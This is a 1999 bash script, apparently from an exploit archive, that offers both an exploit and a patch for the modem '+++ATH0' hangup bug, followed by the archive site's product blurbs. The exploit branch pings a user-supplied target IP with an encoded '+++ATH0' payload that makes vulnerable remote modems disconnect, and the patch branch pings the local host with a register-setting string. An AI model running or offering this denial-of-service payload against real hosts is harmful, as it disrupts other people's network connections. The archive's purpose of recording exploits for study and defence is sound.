`# Script para utilizar como pacth e como exploit para o problema do +++ATH0
# +++ath0.sh - By Nelson R A Brito <[email protected]> - 01/01/99
# [http://www.angelfire.com/sd/stderr]
#!/usr/bin/bash
clear
echo " +++ATH0 PATCH and EXPLOIT - By Nelson R A Brito"
echo " <[email protected]>"
echo " "
echo "Choose (1) to exploit or (2) to patch !"
read ANS1
if test $ANS1
then
if test $ANS1 = 1
then
echo "Give me the dst_ip."
read ANS2
exec ping -p 2b2b2b415448300d $ANS2
elif test $ANS1 = 2
then
echo "Clean +++ATH0's bug in your own machine."
exec ping -p 2b2b2b415453323d32353526574f310d $HOSTNAME
fi
fi
echo "Fuck you dumbass, choose (1) or (2) next time. :>"
exit 1
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation